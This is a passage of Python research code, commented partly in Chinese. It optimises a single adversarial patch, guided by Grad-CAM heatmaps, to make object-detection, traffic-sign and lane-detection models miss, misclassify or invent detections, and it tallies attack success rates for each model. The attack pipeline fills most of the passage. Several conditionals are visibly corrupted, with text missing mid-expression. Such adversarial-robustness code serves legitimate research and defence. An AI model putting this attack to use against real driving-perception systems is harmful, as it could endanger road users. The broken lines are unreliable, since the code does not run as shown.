IsMiss[i]=bool(i_mis)\n Isgeneration[i]=bool(i_difpos)\n \n miss=bool(miss+sum(IsMiss))\n generation=bool(generation+sum(Isgeneration))\n misdetect=bool(misdetect+sum(Ismisclass))\n return miss,misdetect,generation\n\ndef IsMisMisGen_OD(boxinfo_list0,n0,boxinfo_list,n):\n Ismisclass=[0]*(n0+1)\n IsMiss=[0]*(n0+1)\n Isgeneration=[0]*(n0+1)\n if n0>n:\n IsMiss[-1]=1\n if n00.4: # 相同位置\n i_difpos=0 # 相同位置应该认为是误判或者丢失,一定不是generation\n if cls_predi!=cls_predj: #标签不同,相同位置\n # print(\"位置相同,标签不同\",i,j)\n # input()\n if cls_confimisclass i to j\n i_misclass+=1\n else: # 相同位置,相同标签,那么就没有miss\n # print(\"位置相同,标签相同\",i,j)\n i_mis=0\n # print(\"位置不同\",i,j)\n Ismisclass[i]=bool(i_misclass)\n IsMiss[i]=bool(i_mis)\n Isgeneration[i]=bool(i_difpos)\n \n return bool(sum(IsMiss)),bool(sum(Ismisclass)),bool(sum(Isgeneration))\n\ndef setposition_OD(boxinfo_list):\n x1=[]\n y1=[]\n x2=[]\n y2=[]\n N=len(boxinfo_list)\n for i in range(N):\n [xx1, yy1, xx2, yy2, conf, cls_conf, cls_pred]=boxinfo_list[i]\n x1.append(xx1.cpu().numpy())\n y1.append(yy1.cpu().numpy())\n x2.append(xx2.cpu().numpy())\n y2.append(yy2.cpu().numpy())\n \n if N>0:\n idx=np.random.randint(low=0,high=N)\n else:\n idx=0\n \n if x2[idx]>365 and y1[idx]>230:\n pos_x1=np.random.randint(low=x1[idx]-opt.patch_size[0]-10,high=x1[idx]-opt.patch_size[0])\n pos_y1=np.random.randint(low=y1[idx],high=y2[idx]-20)\n else:\n pos_x1=np.random.randint(low=x1[idx]-opt.patch_size[0]-10,high=x2[idx]+10)\n pos_y1=np.random.randint(low=y2[idx],high=y2[idx]+10)\n \n iscox=0\n j=0\n for i in range(N):\n if x1[i]<=pos_x1+opt.patch_size[0] and x2[i]>=pos_x1 and y1[i]<=pos_y1+opt.patch_size[0] and y2[i]>=pos_y1:\n iscox=1\n\n while (iscox) or (pos_x1<0 or pos_x1+opt.patch_size[0]>416):\n j+=1\n print(\"Box crossed, try again.\")\n if x1[idx]>280 and y1[idx]>230:\n pos_x1=np.random.randint(low=x1[idx]-opt.patch_size[0]-10,high=x1[idx]-opt.patch_size[0])\n pos_y1=np.random.randint(low=y1[idx],high=y2[idx]-20)\n else:\n pos_x1=np.random.randint(low=x1[idx]-opt.patch_size[0]-10,high=x2[idx]+10)\n pos_y1=np.random.randint(low=y2[idx],high=y2[idx]+10)\n \n if j%15==0 and N>0 :\n idx=(idx+1)%N\n\n iscox=0\n for i in range(N):\n if x1[i]<=pos_x1+80 and x2[i]>=pos_x1 and y1[i]<=pos_y1+40 and y2[i]>=pos_y1:\n iscox=1\n print(\"pos_y1: \",pos_y1,\", pos_x1: \",pos_x1)\n return [pos_y1,pos_x1]\n\ndef setposition_TS(objs,img_size):\n x1=[]\n y1=[]\n x2=[]\n y2=[]\n N=len(objs)\n for k in range(N):\n x1.append(int(objs[k][1]*opt.img_size_TS/img_size))\n y1.append(int(objs[k][2]*opt.img_size_TS/img_size))\n x2.append(int(objs[k][3]*opt.img_size_TS/img_size))\n y2.append(int(objs[k][4]*opt.img_size_TS/img_size))\n \n \n idx=np.random.randint(low=0,high=N)\n \n pos_x1=np.random.randint(low=x1[idx]-100,high=x2[idx]+100)\n pos_y1=np.random.randint(low=y2[idx],high=y2[idx]+30)\n\n iscox=0\n for i in range(N):\n if x1[i]<=pos_x1+opt.patch_size[0] and x2[i]>=pos_x1 and y1[i]<=pos_y1+opt.patch_size[0] and y2[i]>=pos_y1:\n iscox=1\n j=0\n isover=0\n if (pos_x1<0 or pos_x1+opt.patch_size[0]>opt.img_size_TS or pos_y1<0 or pos_y1+opt.patch_size[0]>opt.img_size_TS):\n isover=1\n while iscox or isover :\n j+=1\n print(\"Box crossed, try again.\")\n pos_x1=np.random.randint(low=x1[idx]-90,high=x2[idx]+20)\n pos_y1=np.random.randint(low=y2[idx]+10,high=y2[idx]+30)\n if j%15==0:\n idx=(idx+1)%N\n \n iscox=0\n for i in range(N):\n if x1[i]<=pos_x1+opt.patch_size[0] and x2[i]>=pos_x1 and y1[i]<=pos_y1+opt.patch_size[0] and y2[i]>=pos_y1:\n iscox=1\n isover=0\n if (pos_x1<0 or pos_x1+opt.patch_size[0]>opt.img_size_TS or pos_y1<0 or pos_y1+opt.patch_size[0]>opt.img_size_TS):\n isover=1\n\n print(\"pos_y1: \",pos_y1,\", pos_x1: \",pos_x1)\n return [pos_y1,pos_x1]\n\ndef load_img_OD(img_path):\n '''\n 加载一张图片数据,并处理成model的输入格式;输入图片的路径\n '''\n img = np.array(Image.open(img_path))\n h, w, _ = img.shape\n dim_diff = np.abs(h - w) \n pad1, pad2 = dim_diff // 2, dim_diff - dim_diff // 2\n pad = ((pad1, pad2), (0, 0), (0, 0)) if h <= w else ((0, 0), (pad1, pad2), (0, 0)) \n # 高度小于宽度时,按行左右填充;否则按列上下填充\n \n # 计算图像对应位置\n rect_xxyy=[0,0,416,416] # kuan_start,gao_start,kuan_end,gao_end\n \n if h<=w:\n rect_xxyy[1]=int(pad1/w * 416)\n rect_xxyy[3]=int((pad1+h)/w * 416)\n else:\n rect_xxyy[0]=int(pad1/h * 416)\n rect_xxyy[2]=int((pad2+w)/h * 416)\n\n img_hidden = np.pad(img, pad, 'constant', constant_values=127.5) / 255. # 归一化了\n \n print(img_hidden.shape,rect_xxyy)\n \n img_hidden=resize(img_hidden, (416, 416, 3), mode='reflect') # 重新变化大小\n img_hidden = np.transpose(img_hidden, (2, 0, 1))\n img_hidden = torch.from_numpy(img_hidden).float()\n\n input_img = Variable(img_hidden.type(Tensor)).unsqueeze(0).to(device)\n return input_img,rect_xxyy\n\ndef parse_detections_OD(results,step):\n '''\n 就是使用model进行检测并且对结果进行处理,返回识别框列表和标签信息列表\n '''\n # 存储每一个bbox并返回用于绘制图像\n bboxinfo_list=[]\n labelinfo_list=[]\n label_string_list=\"\"\n if results[0] is not None:\n bbox_colors=colors\n for x1, y1, x2, y2, conf, cls_conf, cls_pred in results[0]:\n print ('\\t+ Label: %s, Conf: %.5f' % (classes_OD[int(cls_pred)], cls_conf.item()))\n label_string_list+=\"\\t+ Label:\"+ classes_OD[int(cls_pred)] +\", Conf:\"+str(cls_conf.item())+\"
    \"\n # color = bbox_colors[int(np.where(unique_labels == int(cls_pred))[0])]\n color = bbox_colors[int(cls_pred)]\n # store bbox\n bboxinfo_list.append([x1, y1, x2, y2, conf, cls_conf, cls_pred])#,unpad_h,unpad_w,pad_x,pad_y])\n # store labelinfo\n labelinfo_list.append(color)\n # tb_writer.log({\n # 'Labellist':wandb.Html(label_string_list)\n # },step=step)\n return bboxinfo_list,labelinfo_list\n\ndef draw_detections_OD(bboxinfo_list, labelinfo_list,img):\n '''\n draw detected boxes\n '''\n plt.figure()\n fig, ax2 = plt.subplots(1)\n # 图片分辨率 = figsize*dpi 代码为416*416\n plt.rcParams['figure.figsize'] = (8.32, 8.32) \n plt.rcParams['savefig.dpi'] = 50 \n \n ax2.imshow(img)\n \n for i in range(len(labelinfo_list)):\n [x1, y1, x2, y2, conf, cls_conf, cls_pred]=bboxinfo_list[i]\n color=labelinfo_list[i]\n x1=int(x1)\n y1=int(y1)\n x2=int(x2)\n y2=int(y2)\n # Rescale coordinates to original dimensions\n box_h = int(((y2 - y1)))\n box_w = int(((x2 - x1)))\n # Create a Rectangle patch\n bbox = patches.Rectangle((x1, y1), box_w, box_h, linewidth=2,\n edgecolor=color,\n facecolor='none')\n # print(\"bbox type: \",type(bbox))\n ax2.add_patch(bbox)\n plt.text(x1, y1-10, s=classes_OD[int(cls_pred)]+' '+ str('%.4f'%cls_conf.item()), color='white', verticalalignment='top',\n bbox={'color': color, 'pad': 0})\n \n plt.axis('off')\n plt.margins(0,0)\n plt.subplots_adjust(top=1,bottom=0,left=0,right=1,hspace=0,wspace=0)\n plt.gca().xaxis.set_major_locator(NullLocator())\n plt.gca().yaxis.set_major_locator(NullLocator())\n buffer = BytesIO()\n plt.savefig(buffer, format='png')\n new_img = np.asarray(Image.open(buffer))\n plt.close()\n return new_img\n\ndef renormalize_cam_with_bounding_OD(boxinfo_list, image_float_np, grayscale_cam, labelinfo_list=None):\n \"\"\"\n Normalize the CAM to be in the range [0, 1] \n inside every bounding boxes, and zero outside of the bounding boxes. \n 当用来规范整图的cam时,需要注意boxinfo_list=[[x_start,y_start,x_end,y_end]]\n \"\"\"\n if len(boxinfo_list) !=0:\n renormalized_cam = np.zeros(grayscale_cam.shape, dtype=np.float32)\n # print(renormalized_cam.shape)\n for i in range(len(boxinfo_list)):\n x1=int(boxinfo_list[i][0])\n if x1<0:\n x1=0\n elif x1>415:\n x1=415\n y1=int(boxinfo_list[i][1])\n if y1<0:\n y1=0\n elif y1>415:\n y1=415\n x2=int(boxinfo_list[i][2])\n if x2<0:\n x2=0\n elif x2>415:\n x2=415\n y2=int(boxinfo_list[i][3])\n if y2<0:\n y2=0\n elif y2>415:\n y2=415\n\n renormalized_cam[y1:y2, x1:x2] = scale_cam_image(grayscale_cam[y1:y2, x1:x2].copy()) \n renormalized_cam = scale_cam_image(renormalized_cam)\n eigencam_image_renormalized = show_cam_on_image(image_float_np, renormalized_cam, use_rgb=True)\n if labelinfo_list is not None:\n # 如果是需要画图的检测框内热力图绘制框,那么把框画上\n image_with_bounding_boxes = draw_detections_OD(boxinfo_list, labelinfo_list, eigencam_image_renormalized)\n else:\n # 如果只是对整体图片进行热力图切块,那么直接传回就好\n return eigencam_image_renormalized\n else:\n image_with_bounding_boxes=image_float_np\n return image_with_bounding_boxes\n\ndef visualization_OD(grayscale_cam_visual,img_visual,model,tensor,rect_xxyy,step):\n '''\n Detect the img and show with cam\n 输入grayscale_cam_visual,img_visual,rect_xxyy,img_raw都是np矩阵\n '''\n \n # visualization 传入的rect_xxyy是一层的数组[],但是renormalize_cam_with_bounding需要两层的输入[[]],此时传回的是np矩阵\n cam_image=renormalize_cam_with_bounding_OD([rect_xxyy], img_visual, grayscale_cam_visual)\n \n with torch.no_grad():\n results = model(tensor)\n results = non_max_suppression_OD(results, 8, opt.conf_thres, opt.nms_thres)\n \n # 通过parse_detections从results中获取绘图信息\n bboxinfo_list,labelinfo_list= parse_detections_OD(results,step)\n \n # 传递到draw中进行绘制,并返回图像\n heatmap_detect=draw_detections_OD(bboxinfo_list,labelinfo_list, cam_image.copy())\n\n return bboxinfo_list,labelinfo_list,heatmap_detect\n\n# -------------以下是RL使用的函数\n\ndef Draw(seg_pred,exist_pred,img,num,step,suffix):\n # 统计\n n_line=0\n \n # 绘图\n img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)\n line_img = np.zeros_like(img)\n line_img_list=[]\n img_i=line_img.copy()\n color = np.array([[255, 125, 0], [0, 255, 0], [0, 125, 255], [0, 255, 255]], dtype='uint8')\n coord_mask = np.argmax(seg_pred, axis=0)\n # line_img[coord_mask == (0 + 1)] = color[0]\n for i in range(0, 4):\n if exist_pred[0, i] > 0.5:\n # print(\"exit_pred 第\",i,\"个满足阈值\")\n line_img[coord_mask == (i + 1)] = color[i]\n img_fori=img_i.copy()\n img_fori[coord_mask == (i + 1)] = color[i]\n line_img_list.append(img_fori)\n n_line+=1\n \n img_show = cv2.addWeighted(src1=line_img, alpha=0.8, src2=img, beta=1., gamma=0.)\n \n return n_line,line_img_list,line_img,img_show\n\ndef DGF_detect(n_x,n_i,line_x_list,line_i_list):\n color = np.array([[255, 125, 0], [0, 255, 0], [0, 125, 255], [0, 255, 255]], dtype='uint8')\n Disappear,Generate,False_detect=0,0,0\n print(\"n_x: \",n_x,\"n_i: \",n_i)\n diff_list_minus=[]\n diff_list_posit=[]\n for i in range(n_i):\n diff=(line_i_list[i][:,:,1]/line_i_list[i][:,:,1].max()-line_x_list[i][:,:,1]/line_x_list[i][:,:,1].max())\n diff_list_minus.append(sum(sum(np.minimum(diff,0))))\n diff_list_posit.append(sum(sum(np.maximum(diff,0))))\n if sum(sum((line_i_list[i][:,:,1]/line_i_list[i][:,:,1].max())))==0:\n Disappear=1\n for i in range(len(diff_list_minus)):\n if diff_list_posit[i]>200:\n Generate=1\n elif diff_list_minus[i]<-200:\n Disappear=1\n elif diff_list_posit[i]>100:\n False_detect=1\n return Disappear,Generate,False_detect\n\ndef Get_CAM_ALL(x,gradCamTensor):\n with torch.no_grad(): \n output = model_RL(x)\n \n output=output.cpu().numpy()\n coord_mask = np.argmax(output[0], axis=0) \n K=output.shape[1]\n\n # cam_img_hidden=img\n grayscale_cam_all=torch.zeros([288,512]).to(device)\n for k in range(1,K):\n mask_float = np.float32(coord_mask == k)\n targets = [SemanticSegmentationTarget(k, mask_float)] \n grayscale_cam = gradCamTensor(input_tensor=x,targets=targets)[0][0]\n grayscale_cam_all=torch.add(grayscale_cam_all,grayscale_cam)\n\n # # 统一cam并显示\n grayscale_cam_all=grayscale_cam_all/grayscale_cam_all.max()\n return grayscale_cam_all\n\ndef Run_ODTSRL():\n # cam设置\n target_layers_TS = [model_TS.module_list[-2]]\n cam_TS = RemainTensor(model_TS, target_layers_TS, use_cuda=True)\n target_layers_OD = [model_OD.module_list[-2]]\n cam_OD = RemainTensor(model_OD, target_layers_OD, use_cuda=True)\n target_layers = [model_RL.model.layer2[1]] #message_passing层不能加hook!\n gradCamTensor = GradCAMTensor(model=model_RL,target_layers=target_layers,use_cuda=torch.cuda.is_available())\n \n # 统计参量\n MissingASR_TS,MisdetectASR_TS,GenerationASR_TS,TotalASR_TS=0,0,0,0\n MissingASR_OD,MisdetectASR_OD,GenerationASR_OD,TotalASR_OD=0,0,0,0\n MissingASR_RL,MisdetectASR_RL,GenerationASR_RL,TotalASR_RL=0,0,0,0\n\n MisMisMis_ASR,MdtMdtMdt_ASR,GenGenGen_ASR,AttAASR,TotalASR=0,0,0,0,0\n \n \n # 同时对应的数据\n opt.image_folder_RL = crop_dirs_RL\n opt.image_folder_TS = crop_dirs_TS\n opt.image_folder_OD = crop_dirs_OD\n names_TS = os.listdir(opt.image_folder_TS)\n names_RL = os.listdir(opt.image_folder_RL)\n names_OD = os.listdir(opt.image_folder_OD)\n N=min(len(names_TS),len(names_OD),len(names_RL))\n print(\"N == \",N)\n for i in tqdm(range(N)):\n # 统计变量\n isMissing_TS, isMisdetection_TS, isGeneration_TS = 0, 0, 0\n isMissing_OD, isMisdetection_OD, isGeneration_OD = 0, 0, 0\n isMissing_RL, isMisdetection_RL, isGeneration_RL = 0, 0, 0\n\n mismismis,mdtmdtmdt,gengengen,attaodtsrl=0,0,0,0\n\n loss_TS_list=[]\n loss_OD_list=[]\n loss_RL_list=[]\n loss_all_list=[]\n \n # 加载图像路径\n img_path_OD = os.path.join(opt.image_folder_OD, names_OD[i])\n img_path_TS = os.path.join(opt.image_folder_TS, names_TS[i])\n img_path_RL = os.path.join(opt.image_folder_RL, names_RL[i])\n\n # 加载OD图像\n input_img_OD,rect_xxyy_OD=load_img_OD(img_path_OD)\n # 加载TS图像\n input_img_TS = torchvision.transforms.ToTensor()(Image.open(img_path_TS).convert(mode=\"RGB\"))\n input_img_TS, pads = pad_to_square(input_img_TS, 0) #显存增加100M\n show_img_size_TS=input_img_TS.shape[1]\n # 加载RL图像\n img_RL = cv2.imread(img_path_RL)\n img_RL = cv2.cvtColor(img_RL, cv2.COLOR_BGR2RGB)\n img_RL = transform_img({'img': img_RL})['img']\n x_RL = transform_to_net({'img': img_RL})['img']\n x_RL.unsqueeze_(0)\n x_RL=x_RL.to(device)\n\n\n # 进行无patch的检测与显示-----------------------------------------------------------------------------TS \n img_show_TS = Variable(input_img_TS.type(Tensor)).to(device)\n input_img_TS = resize_TS(input_img_TS, opt.img_size_TS).unsqueeze(0) # 重新变化图片大小和格式变化\n input_img_TS = Variable(input_img_TS.type(Tensor)).to(device)\n \n # 生成原始的cam\n with torch.no_grad():\n grayscale_cam_TS = cam_TS(input_img_TS)[0]\n\n # visualization the img without patch\n grayscale_cam_TS_numpy = grayscale_cam_TS.cpu().detach().numpy() # to_numpy, easy visualization\n grayscale_cam_show_TS=cv2.resize(grayscale_cam_TS_numpy, dsize=(show_img_size_TS, show_img_size_TS), interpolation=cv2.INTER_LINEAR)\n \n # 用于展示的原始图片numpy格式\n img_show_TS = img_show_TS.cpu().detach().numpy()\n img_show_TS = np.transpose(img_show_TS,(1,2,0)) #img_visual是np数据类型\n \n # 将cam放在img上\n cam_image_TS = show_cam_on_image(img_show_TS, grayscale_cam_show_TS, use_rgb=True)\n \n with torch.no_grad():\n detections_TS = model_TS(input_img_TS)\n detections_TS = non_max_suppression_TS(detections_TS, opt.conf_thres, opt.nms_thres)[0] \n print(\"---- TS step 0 ----\")\n if detections_TS is not None:\n detections_TS = rescale_boxes_TS(detections_TS, opt.img_size_TS, [show_img_size_TS,show_img_size_TS])\n # 画图在cam贴图上\n img_show = Image.fromarray(cam_image_TS)\n # 用于分类的图片\n img_class = input_img_TS.clone()\n img_class = img_class.squeeze(0).cpu().detach().numpy()\n img_class = np.transpose(img_class,(1,2,0))\n img_class = cv2.resize(img_class, dsize=(show_img_size_TS, show_img_size_TS), interpolation=cv2.INTER_LINEAR)\n img_class = img_class*255\n img_class = Image.fromarray(img_class.astype(np.uint8)) # 用于分类的图片\n obj_0,img_down_0 = classify_draw_TS(opt.image_folder_TS,img_show,img_class,detections_TS,i,1)\n print(\"obj_0: \",obj_0)\n \n else:\n print(\"这个图片没能检测出来目标\")\n continue\n\n # 进行无patch的检测与显示-----------------------------------------------------------------------------OD\n grayscale_cam_OD = cam_OD(input_img_OD)[0]\n # grayscale_cam_OD = 1/(1+torch.exp(-15*(grayscale_cam_OD-0.4))) # soft masking\n\n # visualization the img without patch\n grayscale_cam_show_OD = grayscale_cam_OD.cpu().detach().numpy() # to_numpy, easy visualization\n img_show_OD = input_img_OD.squeeze(0).cpu().detach().numpy()\n img_show_OD = np.transpose(img_show_OD,(1,2,0))\n print(\"---- OD step 0 ----\")\n boxinfo_list0,colorinfo_list0,heatmap_detect_OD=visualization_OD(grayscale_cam_show_OD,img_show_OD,model_OD,input_img_OD,rect_xxyy_OD,0)\n \n \n if len(colorinfo_list0)==0:\n continue\n \n # 进行无patch的检测与显示--------------------------------------------RL \n seg_pred, exist_pred = net(x_RL)[:2]\n seg_pred = seg_pred.detach().cpu().numpy()[0]\n exist_pred = exist_pred.detach().cpu().numpy()\n n_x,line_x_list,line_img_x,img_x_show=Draw(seg_pred,exist_pred,img_RL,i,0,\"NoCam\")\n \n line_img=cv2.cvtColor(line_img_x, cv2.COLOR_RGB2BGR)\n\n # ------------- 获得CAM--------------\n grayscale_cam_all=Get_CAM_ALL(x_RL,gradCamTensor)\n cam_image = show_cam_on_image(np.array(img_RL)/255, grayscale_cam_all.detach().cpu().numpy(), use_rgb=True)\n _,_,_,img_cam_x=Draw(seg_pred,exist_pred,cam_image,i,0,\"WithCam\")\n \n \n # 创建目标热力图----------------------------------------------------------------------------------------TSOD\n orient_cam_TS=grayscale_cam_TS.clone()\n orient_cam_TS[:,:]=torch.zeros(opt.img_size_TS,opt.img_size_TS)\n orient_cam_TS[opt.patch_pos_TS[0]:opt.patch_pos_TS[0]+opt.patch_size[1],opt.patch_pos_TS[1]:opt.patch_pos_TS[1]+opt.patch_size[0]]=torch.ones(opt.patch_size[1],opt.patch_size[0])\n\n orient_cam_OD=grayscale_cam_OD.clone()\n orient_cam_OD[:,:]=torch.zeros(opt.img_size_OD,opt.img_size_OD)\n orient_cam_OD[opt.patch_pos_OD[0]:opt.patch_pos_OD[0]+opt.patch_size[1],opt.patch_pos_OD[1]:opt.patch_pos_OD[1]+opt.patch_size[0]]=torch.ones(opt.patch_size[1],opt.patch_size[0])\n orient_cam_OD=orient_cam_OD[rect_xxyy_OD[1]:rect_xxyy_OD[3],rect_xxyy_OD[0]:rect_xxyy_OD[2]]\n \n cam_orient_tensor=grayscale_cam_all.clone()\n cam_orient_tensor[:,:]=torch.zeros(resize_shape[1],resize_shape[0])\n cam_orient_tensor[opt.patch_pos_RL[0]:opt.patch_pos_RL[0]+opt.patch_size[1],opt.patch_pos_RL[1]:opt.patch_pos_RL[1]+opt.patch_size[0]]=torch.ones(opt.patch_size[1],opt.patch_size[0])\n \n # ---------------------Patch创建---------\n # 新建patch贴图并初始化迭代参数\n patch = torch.rand(3,opt.patch_size[1],opt.patch_size[0])\n patch.requires_grad_(True) # upgrade able\n lr = opt.lr\n optimizer = MyOptimizer([patch], lr=lr)\n scheduler = ReduceLROnPlateau(optimizer, mode='min', factor=0.1, patience=40)\n \n for step in range(1,opt.epochs+1):\n print(f\"step {step} running!!\")\n \n # --------------------------------------在TS下训练并求得loss_TS------------------------------------------\n inputi_TS=input_img_TS.clone()\n ismiss,ismisdetect,isgeneration=0,0,0\n # print(\"加载的inputi大小: \",inputi_TS.shape)\n # attach he patch to the img\n inputi_TS[:,:,opt.patch_pos_TS[0]:opt.patch_pos_TS[0]+opt.patch_size[1],opt.patch_pos_TS[1]:opt.patch_pos_TS[1]+opt.patch_size[0]]=patch\n grayscale_cami_TS = cam_TS(inputi_TS)[0] #似乎只在第一次调用时(子循环内)显存增加2G\n \n # visualization the img with patch\n grayscale_cam_TS_numpyi = grayscale_cami_TS.cpu().detach().numpy() # to_numpy, easy visualization\n grayscale_cam_showi_TS = cv2.resize(grayscale_cam_TS_numpyi, dsize=(show_img_size_TS, show_img_size_TS), interpolation=cv2.INTER_LINEAR)\n inputi_numpy_TS = inputi_TS.squeeze(0).cpu().detach().numpy()\n inputi_numpy_TS = np.transpose(inputi_numpy_TS,(1,2,0))\n inputi_numpy_TS = cv2.resize(inputi_numpy_TS, dsize=(show_img_size_TS, show_img_size_TS), interpolation=cv2.INTER_LINEAR)\n \n # 将cam放在img上\n cam_img_TS_i = show_cam_on_image(inputi_numpy_TS, grayscale_cam_showi_TS, use_rgb=True)\n \n # 进行检测\n with torch.no_grad():\n detections_TS_i = model_TS(inputi_TS)\n detections_TS_i = non_max_suppression_TS(detections_TS_i, opt.conf_thres, opt.nms_thres)[0]\n\n if detections_TS_i is not None:\n detections_TS_i = rescale_boxes_TS(detections_TS_i, opt.img_size_TS, [show_img_size_TS,show_img_size_TS])\n\n # 画图在cam贴图上\n img_show_TS_i = Image.fromarray(cam_img_TS_i)\n inputi_numpy_TS = inputi_numpy_TS*255\n inputi_numpy_TS = Image.fromarray(inputi_numpy_TS.astype(np.uint8)) # 用于分类的图片\n \n # print(\"cam图加载的格式: \",img_show.size)\n obj_i,img_down_i = classify_draw_TS(opt.image_folder_TS,img_show_TS_i,inputi_numpy_TS,detections_TS_i,i,step)\n print(obj_i)\n # print(\"检测返回列表\",obj_i)\n ismiss_TS,ismisdetect_TS,isgeneration_TS=Miss_Generation_Misdetect_TS(obj_0,obj_i)\n print(\"ismiss: \",bool(ismiss_TS),\"\\n ismisdetect: \",bool(ismisdetect_TS),\"\\n isgeneration: \",bool(isgeneration_TS))\n else:\n ismiss_TS=1\n\n # 统计\n if isMissing_TS==0 and ismiss_TS==1: # 之前没有检测到,现在检测到丢失\n isMissing_TS=1\n MissingASR_TS+=1\n\n if isGeneration_TS==0 and isgeneration_TS==1:\n isGeneration_TS=1\n GenerationASR_TS+=1\n\n if isMisdetection_TS==0 and ismisdetect_TS==1:\n isMisdetection_TS=1\n MisdetectASR_TS+=1\n\n # 计算Loss_TS\n loss_TS=compute_loss(grayscale_cami_TS,orient_cam_TS.detach(),2)\n\n \n # --------------------------------------在OD下训练并求得loss_OD------------------------------------------\n print(f\"step {step} running!!\")\n inputi_OD=input_img_OD.clone()\n\n # attach he patch to the img\n inputi_OD[:,:,opt.patch_pos_OD[0]:opt.patch_pos_OD[0]+opt.patch_size[1],opt.patch_pos_OD[1]:opt.patch_pos_OD[1]+opt.patch_size[0]]=patch # need to verify if only patch is updated!! input's requires_grad is True\n grayscale_cam_OD = cam_OD(inputi_OD)[0] # adapt to nparray, need to prevent transformation from tensor to nparray in source code\n # grayscale_cam_OD = 1/(1+torch.exp(-20*(grayscale_cam_OD-0.4))) # soft masking\n\n # visualization\n grayscale_cam_visual = grayscale_cam_OD.cpu().detach().numpy()\n img_visual = inputi_OD.squeeze(0).cpu().detach().numpy()\n img_visual = np.transpose(img_visual,(1,2,0))\n boxinfo_list,labelinfo_list,heatmap_detect=visualization_OD(grayscale_cam_visual,img_visual,model_OD,inputi_OD,rect_xxyy_OD,step)\n\n ismiss_OD,ismisclass_OD,isgeneration_OD=IsMisMisGen_OD(boxinfo_list0,len(colorinfo_list0),boxinfo_list,len(labelinfo_list))\n print(\"丢失:\",bool(ismiss_OD),\"\\n\",\" 误判:\",bool(ismisclass_OD),\"\\n\",\" 新产生:\",bool(isgeneration_OD),\"\\n\")\n\n \n if isMissing_OD==0 and ismiss_OD==1: # 之前没有检测到,现在检测到丢失\n isMissing_OD=1\n MissingASR_OD+=1\n\n if isMisdetection_OD==0 and ismisclass_OD==1:\n isMisdetection_OD=1\n MisdetectASR_OD+=1\n\n if isGeneration_OD==0 and isgeneration_OD==1:\n isGeneration_OD=1\n GenerationASR_OD+=1\n\n cam_now_OD=grayscale_cam_OD[rect_xxyy_OD[1]:rect_xxyy_OD[3],rect_xxyy_OD[0]:rect_xxyy_OD[2]]\n loss_OD = compute_loss(cam_now_OD,orient_cam_OD.detach(),2)\n\n \n # --------------------------------------在RL下训练并求得loss_RL------------------------------------------\n imgi=img_RL.copy()\n # attach he patch to the img\n print(imgi.shape)\n \n xi = transform_to_net({'img':imgi})['img']\n xi.unsqueeze_(0)\n xi[:,:,opt.patch_pos_RL[0]:opt.patch_pos_RL[0]+opt.patch_size[1],opt.patch_pos_RL[1]:opt.patch_pos_RL[1]+opt.patch_size[0]]=patch*255\n xi=xi.to(device)\n\n imgi[opt.patch_pos_RL[0]:opt.patch_pos_RL[0]+opt.patch_size[1],opt.patch_pos_RL[1]:opt.patch_pos_RL[1]+opt.patch_size[0],:]=np.transpose(patch.detach().cpu().numpy(),(1,2,0))*255\n print(imgi.shape)\n # ---------------------------------------------- 检测\n seg_predi, exist_predi = net(xi)[:2]\n seg_predi = seg_predi.detach().cpu().numpy()[0]\n exist_predi = exist_predi.detach().cpu().numpy()\n n_i,line_xi_list,line_img_i,img_xi=Draw(seg_predi,exist_predi,imgi,i,step,\"NoCam\")\n\n disappeari,generatei,false_detecti=DGF_detect(n_x,n_i,line_x_list,line_xi_list)\n print(\"Disappear_RL: \",bool(disappeari),\"\\ngenerate: \",bool(generatei),\"\\nfalse_detect: \",bool(false_detecti))\n # ---------------------------------------------- 获取新CAM\n grayscale_cam_alli=Get_CAM_ALL(xi,gradCamTensor) # 返回的是numpy值\n \n cam_imagei = show_cam_on_image(np.array(imgi)/255, grayscale_cam_alli.detach().cpu().numpy(), use_rgb=True)\n \n _,_,_,img_cam_xi=Draw(seg_predi,exist_predi,cam_imagei,i,step,\"WithCam\")\n\n if isMissing_RL==0 and disappeari==1:\n isMissing_RL=1\n MissingASR_RL+=1\n\n if isGeneration_RL==0 and generatei==1:\n isGeneration_RL=1\n GenerationASR_RL+=1\n\n if isMisdetection_RL==0 and false_detecti==1:\n isMisdetection_RL=1\n MisdetectASR_RL+=1\n\n \n if isMissing_RL==1 and isGeneration_RL==1 and isMisdetection_RL==1:\n break\n loss_RL=compute_loss(grayscale_cam_alli,cam_orient_tensor.detach(),3)\n\n\n if (ismiss_OD or ismisclass_OD or isgeneration_OD):\n OD_attack=1\n else:\n OD_attack=0\n if (ismiss_TS or ismisdetect_TS or isgeneration_TS):\n TS_attack=1\n else:\n TS_attack=0\n if (disappeari or generatei or false_detecti):\n RL_attack=1\n else:\n RL_attack=0\n \n if TS_attack==1 and OD_attack==1 and RL_attack==1 and attaodtsrl==0:\n attaodtsrl=1\n AttAASR+=1\n\n if ismiss_OD and disappeari and ismiss_TS and mismismis==0:\n mismismis=1\n MisMisMis_ASR+=1\n if ismisclass_OD and ismisdetect_TS and false_detecti and mdtmdtmdt==0:\n mdtmdtmdt=1\n MdtMdtMdt_ASR+=1\n if isgeneration_OD and isgeneration_TS and generatei and gengengen==0:\n gengengen=1\n GenGenGen_ASR+=1\n\n if isMissing_RL and isMisdetection_RL and isGeneration_RL and isMissing_OD and isMisdetection_OD and isGeneration_OD and isMissing_TS and isMisdetection_TS and isGeneration_TS:\n print(\"所有攻击均实现,当前step为: \",step)\n break\n \n # -------------------------------------------计算总loss并回传----------------------------\n print(\"Loss_OD is : \",loss_OD.item())\n print(\"Loss_TS is : \",loss_TS.item())\n print(\"Loss_RL is : \",loss_RL.item())\n \n \n loss=loss_TS+loss_OD*2/3+loss_RL/60\n loss_all_list.append(loss.item())\n print(\"loss_All:\",loss.item())\n \n loss.backward() # loss 1 in AoA\n \n optimizer.step()\n scheduler.step(loss)\n\n optimizer.zero_grad()\n \n if isMissing_OD or isMisdetection_OD or isGeneration_OD:\n TotalASR_OD+=1\n if isMissing_TS or isMisdetection_TS or isGeneration_TS:\n TotalASR_TS+=1\n if isMissing_RL or isGeneration_RL or isMisdetection_RL:\n TotalASR_RL+=1\n \n if (isMissing_OD and isMissing_TS and isMissing_RL)or (isMisdetection_OD and isMisdetection_TS and isMisdetection_RL ) or (isGeneration_OD and isGeneration_TS and isGeneration_RL):\n TotalASR+=1\n \n\n MissingASR_TS/=N\n MisdetectASR_TS/=N\n GenerationASR_TS/=N\n TotalASR_TS/=N\n MissingASR_OD/=N\n MisdetectASR_OD/=N\n GenerationASR_OD/=N\n TotalASR_OD/=N\n MissingASR_RL/=N\n MisdetectASR_RL/=N\n 